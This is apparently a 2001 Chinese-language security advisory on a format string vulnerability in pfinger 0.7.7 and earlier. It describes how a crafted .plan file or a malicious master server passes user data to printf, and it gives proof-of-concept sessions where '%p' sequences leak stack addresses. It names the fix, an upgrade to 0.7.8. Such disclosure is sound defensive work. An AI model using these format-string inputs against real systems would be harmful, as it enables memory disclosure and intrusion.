pfinger 存在格式字符串漏洞发布时间:2001-12-21 更新时间:2001-12-21 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 pfinger <= 0.7.7详细描述 使用'./plan'文件可以导致服务器端和客户端产生格式字符串漏洞。 客户端使用精心构建的'./plan'文件会被pfinger客户端传递给printf(3)函数, 而造成格式字符串漏洞。 如果服务器被配置成连接到主服务器(使用<sitehost>指示),从主服务器接收到 的数据会作为第一参数传递给printf(3)函数中。如果恶意用户构建特殊数据可 造成字符格式化漏洞。 测试代码 Client side : evil@test:~$ cat ~/.plan Now a little format string: %p %p %p :-) evil@test:~$ good@test:~$ finger -l evil Login Name: evil In real life: Evil Login Name Status Login time Host evil Evil active Mon 08:02 test No mail. Plan: Now a little format string: 0x8049da0 0x640 0x400a252d :-) good@test:~$ Server side : good@test:~$ cat /etc/fingerconf <fingerconf> <sitehost>master</sitehost> </fingerconf> evil@master:~$ cat ~/.plan Now a little format string: %p %p %p :-) evil@master:~$ telnet test 79 Trying x.x.x.x... Connected to test.lab.intexxia.com. Escape character is '^]'. /W evil Login Name: evil In real life: Evil Login Name Status Login time Host evil Evil active Mon 08:02 master No mail. Plan: Now a little format string: 0xbfbff860 0x400 0x0 :-) Connection closed by foreign host. evil@master:~$ 解决方案 升级到0.7.8版本: http://www.xelia.ch/unix/pfinger/ 相关信息 CERT intexxia cert@intexxia.com 参考:http://archives.neohapsis.com/archives/bugtraq/2001-12/0224.html |
